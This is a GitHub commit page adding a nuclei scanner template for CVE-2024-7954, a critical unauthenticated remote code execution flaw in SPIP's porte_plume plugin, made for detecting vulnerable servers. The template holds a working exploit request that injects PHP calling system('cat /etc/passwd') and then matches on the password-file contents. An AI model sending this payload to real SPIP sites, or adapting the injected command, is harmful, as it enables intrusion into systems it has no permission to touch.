Skip to content

Commit

Permalink
Merge pull request #10623 from Kazgangap/CVE-2024-7954
Browse files Browse the repository at this point in the history
  • Loading branch information
ritikchaddha committed Aug 29, 2024
2 parents 4a1fde0 + 908d968 commit 50f3d31
Showing 1 changed file with 52 additions and 0 deletions.
52 changes: 52 additions & 0 deletions http/cves/2024/CVE-2024-7954.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
id: CVE-2024-7954

info:
name: SPIP Porte Plume Plugin - Remote Code Execution
author: s4e-io
severity: critical
description: |
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
reference:
- https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
- https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
- https://vulncheck.com/advisories/spip-porte-plume
- https://nvd.nist.gov/vuln/detail/CVE-2024-7954
- https://github.com/bigb0x/CVE-2024-7954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-7954
cwe-id: CWE-284
epss-score: 0.00045
epss-percentile: 0.16328
metadata:
max-request: 1
vendor: spip
product: spip
fofa-query: app="SPIP"
tags: cve,cve2024,spip,rce

http:
- raw:
- |
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'

- type: word
part: header
words:
- 'Composed-By: SPIP'

- type: status
status:
- 200

0 comments on commit 50f3d31

Please sign in to comment.